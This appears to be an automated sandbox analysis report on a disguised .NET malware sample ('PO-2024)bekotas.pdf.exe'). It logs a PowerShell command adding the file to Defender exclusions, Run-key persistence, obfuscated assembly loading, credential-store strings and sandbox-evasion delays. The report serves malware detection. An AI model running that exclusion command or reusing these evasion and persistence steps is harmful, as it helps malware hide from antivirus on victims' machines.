                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2231602205.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2231602205.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4457826484.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4457826484.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PO-2024)bekotas.pdf.exe; ReversingLabs: Detection: 23%
                    Source: PO-2024)bekotas.pdf.exe; Virustotal: Detection: 32%
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; File read: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                    Source: unknown; Process created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; Process created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: unknown; Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: unknown; Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe; Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, ntmarta.dll, vaultcli.dll, wintypes.dll, edputil.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, mswsock.dll, rasadhlp.dll, fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, edputil.dll
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder, Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: umXx.pdbSHA256I/ source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr
                    Source: Binary string: umXx.pdb source: PO-2024)bekotas.pdf.exe, ctsdvwT.exe.5.dr

                    Data Obfuscation

                    Source: PO-2024)bekotas.pdf.exe, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.cs, .Net Code: zJ2xFhsRvN System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.5440000.6.raw.unpack, -Module-.cs, .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.5440000.6.raw.unpack, PingPong.cs, .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.2adc2f4.0.raw.unpack, -Module-.cs, .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.2adc2f4.0.raw.unpack, PingPong.cs, .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.cs, .Net Code: zJ2xFhsRvN System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.cs, .Net Code: zJ2xFhsRvN System.Reflection.Assembly.Load(byte[])
                    Source: ctsdvwT.exe.5.dr, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: 0xC92BF28A [Sun Dec 13 15:55:54 2076 UTC]
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Code function: 0_2_050FEFD5 push esp; retf 0_2_050FEFDC
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Code function: 0_2_050F084A pushfd ; ret 0_2_050F0851
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 6_2_07483AD7 push ebx; retf 6_2_07483ADA
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 10_2_0183675D push FFFFFF8Bh; iretd 10_2_0183675F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 10_2_07F74757 push 00000069h; ret 10_2_07F74759
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 10_2_07F766F9 push 00000069h; ret 10_2_07F766FE
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 10_2_07F74557 push 00000069h; ret 10_2_07F74559
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 10_2_07F7654E push ds; iretd 10_2_07F7654F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, Code function: 10_2_07F742FE push 00000069h; ret 10_2_07F74300
                    Source: PO-2024)bekotas.pdf.exe, Static PE information: section name: .text entropy: 7.976240450007284
                    Source: ctsdvwT.exe.5.dr, Static PE information: section name: .text entropy: 7.976240450007284
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, File created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwT

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, File opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | delete
                    Source: Possible double extension: pdf.exe, Static PE information: PO-2024)bekotas.pdf.exe
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: PO-2024)bekotas.pdf.exe PID: 4440, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: ctsdvwT.exe PID: 4332, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398245Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397420Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394110Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1076
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Window / User API: threadDelayed 8594
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe Window / User API: threadDelayed 1271
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 4781
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 5065
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 2154
